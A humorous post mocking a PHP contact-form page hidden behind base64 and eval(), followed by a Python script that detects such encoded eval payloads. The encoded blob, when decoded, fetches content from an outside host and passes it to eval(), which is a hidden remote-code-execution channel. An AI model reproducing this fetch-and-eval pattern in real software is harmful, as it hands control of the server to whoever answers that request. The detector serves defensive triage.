Andreas C stumbled upon what might possibly be the most secure code ever written. At least, according to its original author.

Following are the contents of just one of many similarly coded PHP pages...

<?PHP session_start();
$str = 'PD9waHAgc2Vzc2lvbl9zdGFydCgpOyAgDQoNCi8vL01BSUxQRVJNSU4vLy8NCmlmIChpc3NldCgkX1NFU1
NJT05bJ3o4MTJGNzA4QTE4MjYyOTJmUzY1NjlQNzY1QTc1MzE5MzV6NDg1MkU3NDhBNTgzMDI1MiddKSkgew0KICAk
X1NFU1NJT05bJ3g2MTBZNzA2QTE2MjYwOTRoUzQ5NTNXNzQ5QTU5MzAzNTFaNjQ2OEw3NjRBNzQzMTgzNiddID0gdG
ltZSgpOw0KICAkczMzMzdGNzMzQTQzMjg3NjdVNTE1NUE3NTFBNjEzMDU0OXgzODQySzczOEE0ODI5MjYyID0gDQog
ICAgYWJzKCRfU0VTU0lPTlsneDYxMFk3MDZBMTYyNjA5NGhTNDk1M1c3NDlBNTkzMDM1MVo2NDY4TDc2NEE3NDMxOD
M2J10gDQogICAgICAtICRfU0VTU0lPTlsnejgxMkY3MDhBMTgyNjI5MmZTNjU2OVA3NjVBNzUzMTkzNXo0ODUyRTc0
OEE1ODMwMjUyJ10pOyANCg0KICAkejMyMzZUNzMyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1Nj
MwMDU0ID0gJHMzMzM3RjczM0E0MzI4NzY3VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiAvIDYwOw0K
ICBpZiAoICgkX1NFU1NJT05bJ3MxNzIxVTcxN0EyNzI3MTgzdDI2RDcwMmExMjI2MDE5OHh5NzExVDcwN0ExNzI2MT
kzaiddID49IDIwKSAgDQogICAgICAgJiYgKCRzMzMzN0Y3MzNBNDMyODc2N1U1MTU1QTc1MUE2MTMwNTQ5eDM4NDJL
NzM4QTQ4MjkyNjIgPD0gMzAqIDYwICkpIHsNCiAgICAkejMyMzZUNzMyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3
g0NjUwUzc0NkE1NjMwMDU0ID0gMzAgKiA2MCAtICR6MzIzNlQ3MzJBNDIyODY2OHU0MzQ3Wjc0M0E1MzI5NzU3eDQ2
NTBTNzQ2QTU2MzAwNTQ7DQogICAgZWNobyAieW91IGhhdmUgZXhjZWVkZWQgdGhlIG51bWJlciBvZiB0aW1lcyB5b3
UgYXJlIGFsbG93ZWQgdG8gdXNlIHRoaXMgZm9ybSA8YnI+PGJyPlBsZWFzZSB0cnkgYWdhaW4gaW4gYW4gb25lICgx
KWhvdXIgb3IgdGhyZWUoMyk8YnI+IjsNCiAgICBleGl0Ow0KICB9DQogIGVsc2VpZiAoJHMzMzM3RjczM0E0MzI4Nz
Y3VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiA+IDMwKiA2MCApIHsNCiAgICBzZXNzaW9uX3Vuc2V0
KCk7IA0KICAgICRfU0VTU0lPTlsnczE3MjFVNzE3QTI3MjcxODN0MjZENzAyYTEyMjYwMTk4eHk3MTFUNzA3QTE3Mj
YxOTNqJ10gPSAwOw0KICB9CQ0KfSANCmlmIChpc3NldCAoJF9TRVNTSU9OWyd5NzExVDcwN0ExNzI2MTkzalM1NzYx
VDc1N0E2NzMxMTQzWjU2NjBZNzU2QTY2MzEwNDQnXSkpIHsNCiAgJF9TRVNTSU9OWyd4NjEwWTcwNkExNjI2MDk0aF
M0OTUzVzc0OUE1OTMwMzUxWjY0NjhMNzY0QTc0MzE4MzYnXSA9IHRpbWUoKTsNCiAgJHMzMzM3RjczM0E0MzI4NzY3
VTUxNTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiA9IA0KICAgIGFicygkX1NFU1NJT05bJ3g2MTBZNzA2QT
E2MjYwOTRoUzQ5NTNXNzQ5QTU5MzAzNTFaNjQ2OEw3NjRBNzQzMTgzNiddIA0KICAgICAgLSAkX1NFU1NJT05bJ3k3
MTFUNzA3QTE3MjYxOTNqUzU3NjFUNzU3QTY3MzExNDNaNTY2MFk3NTZBNjYzMTA0NCddKTsNCg0KICAkejMyMzZUNz
MyQTQyMjg2Njh1NDM0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1NjMwMDU0ID0gJHMzMzM3RjczM0E0MzI4NzY3VTUx
NTVBNzUxQTYxMzA1NDl4Mzg0Mks3MzhBNDgyOTI2MiAvIDYwOw0KDQogIGlmICgkejMyMzZUNzMyQTQyMjg2Njh1ND
M0N1o3NDNBNTMyOTc1N3g0NjUwUzc0NkE1NjMwMDU0ID4gMikgew0KICAgICRfU0VTU0lPTlsneDIyMjZENzIyQTMy
Mjc2NzhUNjY3ME83NjZBNzYzMjAzNHkzMTM1WTczMUE0MTI4NTY5J10gPSAiIjsNCiAgfQ0KfQkJCQkJCQkJCQkJCQ
kJCQkJCQkJCQkvLy9NQUlMUEVSTUlOLy8vDQoNCiRpZF9oZCA9ICc4OEJCLTU4MjInOw0KJGlkX251bSA9ICdmZ2ho
aWprbGtsbW5vcHFyc3R2dnZ3eHd5eUJESkxOUVNVWVphWmRlZmhra21tbnBwcXN2eUFCREVGSUxRVVhYWVhXVE9JeG
tXSnluZldOSUN6dXFsZmFWUExHQXRsZmJWU09MS0lJSkxQVmFmbHJ5SFNkbXhHUGJpckFKVWd1RlEnOw0KPz4NCjw/
cGhwIA0KDQokbXlfdmFyID0gJyc7DQokcGFnZV9kYXRhID0gPDw8IFBBR0VfREFUQQ0KUEFHRV9EQVRBOw0KJFk2Mz
Y3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAxMzQ1MSA9IEBmb3BlbiAoImh0dHA6Ly93
d3cuc3BhbWZyZWVjb250YWN0LmNvbS9lcnIvP189NDAyJm9rPSRpZF9udW0iLCAiciIpOw0KaWYgKCEkWTYzNjdLNz
YzQTczMzE3MzdXODU4OUI3ODVBOTUzMzkxNVU5MTk1Tzc5MUExMDEzNDUxKSB7DQogIC8qIGVjaG8gIjxwPlVuYWJs
ZSB0byBvcGVuIHJlbW90ZSBmaWxlLiI7ICovIA0KICAvKiBleGl0OyAqLw0KfQ0KZWxzZSB7DQoNCiAgd2hpbGUgKC
FmZW9mKCRZNjM2N0s3NjNBNzMzMTczN1c4NTg5Qjc4NUE5NTMzOTE1VTkxOTVPNzkxQTEwMTM0NTEpKSB7DQogICAg
JFk1NTU5VTc1NUE2NTMwOTQ1dzI5MzNINzI5QTM5MjgzNzF2NDhINzA0QTE0MjYwMzk2dyAuPSBmZ2V0cyAoJFk2Mz
Y3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAxMzQ1MSwgMTAyNCk7DQogIH0NCiAgZXZh
bCAoJyA/PicgLiAkWTU1NTlVNzU1QTY1MzA5NDV3MjkzM0g3MjlBMzkyODM3MXY0OEg3MDRBMTQyNjAzOTZ3IC4gJz
w/cGhwICcpOw0KICBmY2xvc2UoJFk2MzY3Szc2M0E3MzMxNzM3Vzg1ODlCNzg1QTk1MzM5MTVVOTE5NU83OTFBMTAx
MzQ1MSk7DQp9DQoNCmlmICgoJGdvdHRlbiA9PSAxMTEpJiYoJGhkID09ICRpZF9oZCApKSB7DQogIGluY2x1ZGUgKC
dpbml0cm9kZUdsb2JhbF9jb20ucGhwJyk7DQp9IA0KZWxzZWlmICgkZ290dGVuICE9IDExMSkgeyANCiAgaW5jbHVk
ZSAoJ2luaXRyb2RlR2xvYmFsX2NvbS5waHAnKTsNCn0gDQplbHNlaWYgKCgkZ290dGVuID09IDExMSkmJigkaGQgIT
0gJGlkX2hkICkpIHsNCiAgZWNobyAkZXJyb3JfbXNnOw0KfSANCj8+'; $str2 = base64_decode($str); /* echo '<pre>'.$str2.'</pre>'; */ /* exit(); */ eval (' ?' . '>' .$str2 . '<' . '?php ');?>


Of course, base-64 encoding was not the original coder’s only line of defense. Just in case a clever hacker gained access to the server containing the PHP code files, and figured out how to decode base-64, the hacker would likely hit a wall against these impossibly long variable names in the decoded code...

///MAILPERMIN///
if (isset($_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252'])) {
  $_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] = time();
  $s3337F733A4328767U5155A751A6130549x3842K738A4829262 = 
    abs($_SESSION['x610Y706A1626094hS4953W749A5930351Z6468L764A7431836'] 
      - $_SESSION['z812F708A1826292fS6569P765A7531935z4852E748A5830252']); 
  
  $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 
    = $s3337F733A4328767U5155A751A6130549x3842K738A4829262 / 60;
  
  if ( ($_SESSION['s1721U717A2727183t26D702a12260198xy711T707A1726193j'] >= 20)  
       && ($s3337F733A4328767U5155A751A6130549x3842K738A4829262 <= 30* 60 )) {
    $z3236T732A4228668u4347Z743A5329757x4650S746A5630054 
      = 30 * 60 - $z3236T732A4228668u4347Z743A5329757x4650S746A5630054;
    echo "you have exceeded the number of times you are allowed to use this form
          <br><br>Please try again in an one (1)hour or three(3)<br>";
    exit;
  
  ...


Of course, the full code is certainly worth checking out. So, hackers, go forth and decode.
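The same two-step pattern shown above (a base64 literal in one variable, base64_decode() into a second, then eval() on the result) is what a defender looks for when triaging PHP files on a server. The script below is an added example, not code from the post: it decodes any literal that follows that pattern and lists overlong variable names like the ones in the decoded excerpt. The sample input is constructed to mirror the post's wrapper and does not use the post's blob.

```python
import base64
import re

# The post's wrapper: $str = '<base64>'; $str2 = base64_decode($str); eval(... $str2 ...)
_LITERAL_RE = re.compile(r"\$(\w+)\s*=\s*'([A-Za-z0-9+/=\s]{32,})'\s*;")
_DECODE_RE = re.compile(r"\$(\w+)\s*=\s*base64_decode\s*\(\s*\$(\w+)\s*\)")
_EVAL_RE = re.compile(r"\beval\s*\(")
_IDENT_RE = re.compile(r"\$([A-Za-z_]\w*)")


def decode_eval_payloads(php_src):
    """Return {literal_var: decoded_php} for each base64 literal that the file
    passes through base64_decode() in a file that also calls eval()."""
    if not _EVAL_RE.search(php_src):
        return {}
    literals = dict(_LITERAL_RE.findall(php_src))
    decoded_from = {src for _dst, src in _DECODE_RE.findall(php_src)}
    out = {}
    for var, blob in literals.items():
        if var in decoded_from:
            # b64decode() drops whitespace by default, so literals that wrap
            # across lines (as in the post) still decode.
            out[var] = base64.b64decode(blob).decode("latin-1")
    return out


def long_identifiers(php_src, min_len=40):
    """Variable names of min_len+ characters: the randomised, overlong names
    seen in the decoded excerpt are a cheap obfuscation indicator."""
    return sorted({n for n in _IDENT_RE.findall(php_src) if len(n) >= min_len})


def analyze(php_src):
    """Run both checks on the visible code and on whatever it decodes."""
    payloads = decode_eval_payloads(php_src)
    decoded_all = "\n".join(payloads.values())
    return {
        "eval_payloads": payloads,
        "long_identifiers": long_identifiers(php_src + "\n" + decoded_all),
        "nested_eval": bool(_EVAL_RE.search(decoded_all)),
    }


# Constructed sample in the shape of the post's wrapper (not the post's blob).
_HIDDEN = ("<?php $z812F708A1826292fS6569P765A7531935z4852E748A5830252 = time(); "
           "echo 'contact form'; ?>")
SAMPLE_PHP = ("<?PHP session_start(); $str = '"
              + base64.b64encode(_HIDDEN.encode()).decode()
              + "'; $str2 = base64_decode($str); "
              "eval (' ?' . '>' . $str2 . '<' . '?php ');?>")

if __name__ == "__main__":
    for var, code in analyze(SAMPLE_PHP)["eval_payloads"].items():
        print(f"${var} decodes to:\n{code}")
```

Point it at a real file with `analyze(open(path).read())`; a non-empty `eval_payloads` or `nested_eval` result is what merits a manual read of the decoded text.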

As for what this super-secret-sensitive page was used for... it was a “Contact Us” form.
